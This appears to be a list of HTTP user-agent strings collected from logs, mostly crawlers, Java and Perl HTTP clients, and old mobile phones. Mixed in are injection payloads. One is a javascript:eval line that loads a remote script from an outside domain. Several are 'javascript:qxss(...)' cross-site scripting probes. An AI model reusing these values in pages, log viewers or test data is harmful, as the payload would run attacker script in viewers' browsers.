HuaweiC6100 Java/HWJa/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UNTRUSTED/1.0
Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_102)
yacybot (/global; amd64 Linux 4.13.0-39-generic; java 1.8.0_162; America/en) http://yacy.net/bot.html
libwww-perl/5.79
yacybot (/global; amd64 Windows 10 10.0; java 1.8.0_121; America/en) http://yacy.net/bot.html
Unknown/2.0 (Java; U; MIDP-2.0; id-KR; Mozilla) U2/1.0.0 Unknown/9.5.0.449 U2/1.0.0 Mobile UNTRUSTED/1.0
Java/1.6.0_03
SynHttpClient-Built/5750
yacybot (/global; x86 Windows 10 10.0; java 1.8.0_151; Europe/fr) http://yacy.net/bot.html
FlickBot 2.0 RPT-HTTPClient/0.3-3
yacybot (-global; amd64 Linux 4.15.14-1-ARCH; java 9.0.4; Europe/de) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.7.0_80; Europe/en) http://yacy.net/bot.html
Awesomium - Test
unirest-java/1.3.11
yacybot (freeworld/global; amd64 Linux 3.12.43-52.6-default; java 1.8.0_40; Europe/en) http://yacy.net/bot.html
Mozilla/5.0 (Vodafone/1.0/LG-GT400/V10g Browser/Teleca-Q7.1 MMS/LG-MMS-V1.0/1.2 MediaPlayer/LGPlayer/1.0 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
yacybot (/global; amd64 Linux 3.13.0-107-generic; java 1.7.0_121; Europe/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.9.78-xxxx-std-ipv6-64; java 9-Ubuntu; Europe/pl) http://yacy.net/bot.html
Java/1.7.0_20
yacybot (/global; amd64 Linux 4.13.0-36-generic; java 1.8.0_151; America/en) http://yacy.net/bot.html
Java/1.9.0_20
Apache-HttpClient/4.5.1 (Java/1.8.0_92)
Python-urllib/2.7 AppEngine-Google; (+http://code.google.com/appengine)
EasyHttp HttpClient v1.7.0.0
Awesomium/1.6.5
Java/1.8.0_20
yacybot (/global; amd64 Linux 4.14.16-1-MANJARO; java 1.8.0_162; Europe/es) http://yacy.net/bot.html
yacybot (webportal-global; amd64 Linux 3.16.0-4-amd64; java 1.8.0_111; Europe/fr) http://yacy.net/bot.html
Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Java/1.7.0_67
yacybot (/global; amd64 Linux 4.4.0-119-generic; java 1.8.0_162; Australia/en) http://yacy.net/bot.html
SonyEricssonZ780i/R3BA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3.0
LWP::Simple/5.835 libwww-perl/5.836
Apache-HttpClient/4.5.4 (Java/1.8.0_161)
yacybot (/global; amd64 Linux 4.11.3-gnu; java 1.8.0_131; Europe/fr) http://yacy.net/bot.html
Java/1.6.0_23
RPT-HTTPClient/0.3-3E
Java/1.7.0_10
Azureus 4.3.0.4;Windows 7;Java 1.6.0_18-ea
Mozilla/5.0 (LG-C193 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Java/1.6.0_43
yacybot (/global; amd64 Linux 4.4.0-124-generic; java 1.8.0_181; Europe/de) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.8.0_102; Europe/en) http://yacy.net/bot.html
robotyacybotyacybot (freeworld/global; x86 Windows 7 6.1; java 1.6.0_31; Europe/de) http://yacy.net/bot.html
Java/1.7.0_04
Java/1.8.0_152-snc2
Awesomium 1.7.x
Apache-HttpClient/4.5.5 (Java/1.7.0_71)
Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_31)
robotyacybotyacybot (freeworld/global; amd64 Linux 3.0.0-17-generic; java 1.6.0_23; America/en) http://yacy.net/bot.html
yacybot (/global; x86 Windows 10 10.0; java 1.8.0_131; Europe/de) http://yacy.net/bot.html
Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.6) LG-KS20/TIM/V10b Browser/IEMobile/7.6 MMS/LG-MMS-WINCE-V1.0/1.2 Java/LGVM/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
Zjavascript:eval('var a=document.createElement('script');a.src='https://zyqa.ga/aq';document.body.appendChild(a)')
Java/1.4.1_04
yacybot (/global; i386 Linux 4.13.0-39-generic; java 1.8.0_162; Europe/ru) http://yacy.net/bot.html
Apache-HttpClient/4.5.5 (Java/1.8.0_171)
Mozilla/5.0 (Windows NT 6.3; Trident/8.0; Java/1.7.0_45; rv:12.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; Trident/8.0; Java/1.7.0_51; rv:12.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; Trident/8.0; Java/1.7.0_51; rv:12.0)
yacybot (/global; amd64 Linux 4.0.9-gentoo; java 1.8.0_151; Europe/de) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.4.0-65-generic; java 1.8.0_121; Europe/fr) http://yacy.net/bot.html
Mozilla/5.0 (Java 1.6.0_01; Windows XP 5.1 x86; en) ICEbrowser/v6_1_2
yacybot (-global; amd64 Windows 7 6.1; java 1.8.0_73; Europe/en) http://yacy.net/bot.html
/// 1280x768x32 NO JAVA
SonyEricssonT707/R1GA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.4
Nokia301/2.0 (09.04) Profile/MIDP-2.1 Configuration/CLDC-1.1 M4A1-WAPCHOI/2.0 (Java; U; MIDP-2.0; vi; Nokia301) WAPCHOI/1.0.0 UCPro/9.4.1.377 U2/1.0.0 Mobile UNTRUSTED/1.0
Java/1.7.0_60
yacybot (/global; amd64 Linux 4.4.143-94.47-default; java 1.8.0_171; Europe/en) http://yacy.net/bot.html
Java1.3.x
Java/1.6.0_41
yacybot (-global; amd64 Linux 3.10.0-693.21.1.el7.x86_64; java 1.8.0_161; America/en) http://yacy.net/bot.html
Cyotek WebCopy/1.0.3.2 CyotekHttpClient/2.0.1.2
yacybot (/global; amd64 Linux 4.16.0-0.bpo.1-amd64; java 9-Debian; Europe/de) http://yacy.net/bot.html
Link Status Verifier (http://www.linkagogo.com/) Java/1.7.0_65
Apache-HttpClient/4.5.5 (Java/1.8.0_20)
yacybot (/global; amd64 Windows 10 10.0; java 1.8.0_161; Europe/fr) http://yacy.net/bot.html
SonyEricssonW995/R1H Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.5
yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.7.0_111; Europe/fi) http://yacy.net/bot.html
Java/1.6.0_38
yacybot (freeworld/global; amd64 Windows 7 6.1; java 1.7.0_25; Europe/en) http://yacy.net/bot.html
LWP::Simple/6.00 libwww-perl/6.02
yacybot (/global; amd64 Windows 8 6.2; java 1.8.0_31; Europe/en) http://yacy.net/bot.html
okhttp/3.11.0
yacybot (-global; amd64 FreeBSD 9.2-RELEASE-p10; java 1.7.0_65; Europe/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.4.0-121-generic; java 1.8.0_181; Europe/en) http://yacy.net/bot.html
yacybot (/global; amd64 Windows 7 6.1; java 1.8.0_181; America/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.8.0_102; Etc/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.3.0-gentoo; java 1.7.0_79; Europe/fr) http://yacy.net/bot.html
Java/9.0.1
feedfinder/1.371 Python-urllib/1.17 +http://www.aaronsw.com/2002/feedfinder/
SonyEricssonC510/R1FA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.3
SonyEricssonC901/R1GA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.4
Apache-HttpClient/release (java 1.5)
Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_25)
Java/1.7.0_40
yacybot (/global; amd64 Linux 2.6.32-042stab126.1; java 1.8.0_161; America/en) http://yacy.net/bot.html
SonyEricssonW995/R1HA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 model-orange JavaPlatform/JP-8.4.5
yacybot (/global; amd64 Windows 7 6.1; java 1.8.0_161; Australia/en) http://yacy.net/bot.html
Apache-HttpClient/4.5.1 (Java/1.8.0_60)
Apache-HttpClient/4.0.3 (java 1.5)
Apache-HttpClient/4.5.2 (Java/1.8.0_25)
Java/1.7.0_91
yacybot (/global; amd64 Linux 4.10.0-21-generic; java 1.8.0_131; Europe/pl) http://yacy.net/bot.html
SonyEricssonW518a/R1EB009 Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.2
yacybot (/global; amd64 Windows 10 10.0; java 1.8.0_151; Europe/de) http://yacy.net/bot.html
Java/1.5.0_11
amibot - http://www.amidalla.de - tech@amidalla.com libwww-perl/5.805
Mozilla/5.0 (Windows; ; Windows NT 5.1; rv:1.9.1.2) Gecko/20090729 Python-urllib/3.1
yacybot (/global; amd64 Windows 7 6.1; java 1.8.0_131; Europe/ru) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.4.0-51-generic; java 1.8.0_111; Europe/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.7.0_75; America/en) http://yacy.net/bot.html
Java/1.4.2_17
yacybot (/global; amd64 Linux 3.2.0-4-amd64; java 1.7.0_75; America/en) http://yacy.net/bot.html
Wolfram HTTPClient 10.4
Java/10.0.2
libwww-perl/5.52 FP/4.0
yacybot (freeworld/global; amd64 Windows 7 6.1; java 1.7.0_25; GMT-03:00/pt) http://yacy.net/bot.html
Java/1.6.0_30
yacybot (/global; amd64 Linux 4.15.15-1-vfio; java 1.8.0_162; America/en) http://yacy.net/bot.html
SonyEricssonW20/R7DA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
yacybot (webportal-global; amd64 Linux 3.16.0-4-amd64; java 1.7.0_151; Europe/de) http://yacy.net/bot.html
2Bone_LinkChecker/1.0 libwww-perl/6.05
Nokia311/5.0 (07.36) Profile/MIDP-2.1 Configuration/CLDC-1.1 M4A1-WAPCHOI/2.0 (Java; U; MIDP-2.0; vi; Nokia311) WAPCHOI/1.0.0 UCPro/9.4.1.377 U2/1.0.0 Mobile UNTRUSTED/1.0
SonyEricssonC902/R3CA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 model-orange JavaPlatform/JP-8.3.1
Apache-HttpClient/4.5 (Java/1.8.0_92)
Rewebber/1.2 libwww-perl/5.41
Mozilla/5.0 (LG-T370 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
yacybot (/global; amd64 Linux 4.10.15-1-pve; java 1.8.0_162; Etc/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.4.49-16-default; java 1.8.0_121; Europe/en) http://yacy.net/bot.html
SonyEricssonC903/R1GA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.4
yacybot (/global; amd64 Linux 4.9.0-2-amd64; java 9-Debian; Etc/en) http://yacy.net/bot.html
Apache-HttpAsyncClient/4.1.1 (Java/1.8.0_161)
yacybot (webportal-global; amd64 Windows 10 10.0; java 1.8.0_151; America/en) http://yacy.net/bot.html
Apache-HttpAsyncClient/4.1.3 (Java/1.8.0_151)
Apache-HttpClient/4.5.1 (Java/1.7.0_07)
Apache-HttpClient/4.5.3 (Java/1.8.0_181)
Python-urllib/2.0a1
yacybot (/global; amd64 Linux 4.13.0-31-generic; java 1.8.0_151; Europe/de) http://yacy.net/bot.html
libwww-perl/5.45
Mozilla/5.0 Java/1.8.0_162
Oracle HTTPClient Version 10h
yacybot (/global; amd64 Linux 2.6.32-042stab127.2; java 9-internal; Etc/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.9.16-1-lts; java 1.8.0_121; GMT+01:00/de) http://yacy.net/bot.html
yacybot (/global; x86 Windows 10 10.0; java 1.8.0_151; America/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.9.0-7-amd64; java 1.8.0_171; America/en) http://yacy.net/bot.html
Java/1.6.0_45
Apache-HttpClient/4.5.2 (Java/1.8.0_112)
Java/1.6.0_34
Java/1.6.0_39
libwww-perl/6.03
Mozilla/5.0 (Vodafone/1.0/LG-T500/V10c AppleWebKit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
SonyEricssonW995/R1GA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.4
About/0.1libwww-perl/5.47
yacybot (intranet-local; amd64 Linux 4.4.0-75-generic; java 1.8.0_121; Europe/de) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.4.0-124-generic; java 1.8.0_171; Europe/de) http://yacy.net/bot.html
Mozilla/5.0 (LG-C195N AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Mozilla/7.0 (Ubuntu 22; Linux 64;  Java/1.0; En: rv:18.0) Experimental
SonyEricssonC903/R1EA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.2
yacybot (/global; amd64 Linux 4.9.0-4-amd64; java 1.8.0_151; UTC/en) http://yacy.net/bot.html
Mozillajavascript:qxss(X141229100Y1Z);
yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.8.0_101; Europe/en) http://yacy.net/bot.html
yacybot (/global; x86_64 Mac OS X 10.11.6; java 1.8.0_101; America/en) http://yacy.net/bot.html
Mozillajavascript:qxss(X142614320Y1Z);
yacybot (/global; x86_64 Mac OS X 10.10.5; java 1.8.0_101; Europe/en) http://yacy.net/bot.html
Mozillajavascript:qxss(X142016396Y1Z);
yacybot (freeworld/global; amd64 Linux 3.13.0-24-generic; java 1.7.0_55; Europe/de) http://yacy.net/bot.html
Mozillajavascript:qxss(X142803956Y1Z);
Java/1.7.0_05
Mozillajavascript:qxss(X142992764Y1Z);
Mozillajavascript:qxss(X142614244Y1Z);
Apache-HttpClient/4.5.2 (Java/1.8.0_74)
yacybot (/global; amd64 Linux 4.14.12-1-default; java 1.8.0_151; Europe/en) http://yacy.net/bot.html
LG-GT405-Orange/V10f Browser/Teleca-Q7.1 MMS/LG-MMS-V1.0/1.2 MediaPlayer/LGPlayer/1.0 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1
Mozilla/4.0 SonyEricssonC510v/R1FA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.3
Java/1.6.0_19
yacybot (/global; amd64 Linux 4.6.3-gentoo; java 1.8.0_101; Europe/de) http://yacy.net/bot.html
yacybot (freeworld/global; amd64 Linux 3.10.1-pf; java 1.8.0-ea; America/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.9.0; java 1.8.0_181; Europe/de) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 3.10.0-693.21.1.el7.x86_64; java 1.8.0_161; Europe/de) http://yacy.net/bot.html
SonyEricssonU10i/R1DA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.0
yacybot (freeworld/global; amd64 Windows 7 6.1; java 1.7.0_55; Europe/de) http://yacy.net/bot.html
Mozilla/3.0 (Planetweb/3.0d JS SSL pJava US; Dreamcast US)
Google-HTTP-Java-Client/1.20.0 (gzip)
android symbian java
LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/3.1 +http://www.linkedin.com)/1.0 (LinkedInBot; https://www.linkedin.com/; omni-crawler@linkedin.com)
Java/1.6.0_51
yacybot (/global; amd64 Linux 4.15.9-1-ARCH; java 9.0.4; Europe/de) http://yacy.net/bot.html
Java/1.6.0_10
Java/1.7.0_51
Python-urllib/1.17 AppEngine-Google; (+http://code.google.com/appengine; appid: s~j-upload)
Java/1.7.0_13
yacybot (/global; amd64 Linux 4.13.0-43-generic; java 1.8.0_171; Europe/en) http://yacy.net/bot.html
yacybot (/global; amd64 Windows Server 2008 R2 6.1; java 1.8.0_161; Europe/en) http://yacy.net/bot.html
